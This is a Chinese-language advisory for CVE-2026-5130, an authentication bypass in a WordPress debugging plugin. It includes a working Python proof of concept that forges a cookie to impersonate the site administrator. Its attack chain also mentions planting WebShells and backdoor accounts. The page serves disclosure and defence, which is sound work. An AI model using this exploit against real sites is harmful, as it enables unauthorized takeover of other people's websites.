CVE-2026-5130 CVSS 8.8 高危

CVE-2026-5130 WordPress插件权限提升漏洞

披露日期: 2026-03-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5130

漏洞类型

未授权权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Debugger & Troubleshooter Plugin for WordPress

漏洞概述

WordPress的Debugger & Troubleshooter插件在1.3.2及之前版本中存在未授权权限提升漏洞。由于该插件直接接受wp_debug_troubleshoot_simulate_user cookie的值作为用户ID，且未进行任何加密验证或授权检查，攻击者可以通过修改该Cookie来绕过身份验证，模拟任意用户（包括管理员）。这可能导致攻击者完全接管受影响的WordPress网站，执行创建管理员账户、修改内容、安装插件等高危操作。

技术细节

该漏洞的核心原因在于插件错误地处理了用户模拟逻辑。插件通过覆盖WordPress的determine_current_user过滤器来实现用户切换功能，但在处理wp_debug_troubleshoot_simulate_user cookie时，直接将其值作为当前登录用户的ID返回，而未验证请求者的身份或Cookie的有效性。正常逻辑应包含管理员授权和令牌验证，但受影响版本完全缺失这些安全机制。攻击者无需任何认证，只需将浏览器Cookie中的wp_debug_troubleshoot_simulate_user值设置为管理员账户的ID（通常为1），即可欺骗系统认为其已以管理员身份登录。利用此漏洞，攻击者能够执行任意管理员操作，包括上传WebShell、篡改数据等，导致站点完全沦陷。1.4.0版本通过引入基于加密令牌的验证机制修复了此问题。

攻击链分析

STEP 1

侦察阶段

攻击者识别目标站点安装了Debugger & Troubleshooter插件且版本小于等于1.3.2。

STEP 2

漏洞利用

攻击者向目标站点发送HTTP请求，并在请求头中添加恶意Cookie：wp_debug_troubleshoot_simulate_user=1（管理员ID）。

STEP 3

权限提升

服务器端插件直接读取Cookie值并覆盖当前用户上下文，攻击者无需密码即获得管理员权限。

STEP 4

维持控制

攻击者利用管理员权限创建后门账户或上传WebShell，以实现对网站的长期控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

target_url = "http://example.com/wp-admin/"

# Set the vulnerable cookie to the target user ID (e.g., 1 for admin)
cookies = {
    "wp_debug_troubleshoot_simulate_user": "1"
}

response = requests.get(target_url, cookies=cookies)

if "Dashboard" in response.text:
    print("[+] Successfully exploited! Privilege escalation achieved.")
else:
    print("[-] Exploit failed.")

影响范围

Debugger & Troubleshooter <= 1.3.2

防御指南

临时缓解措施

建议暂时禁用该插件直至完成升级，并限制WordPress管理后台的访问IP地址，以降低潜在风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表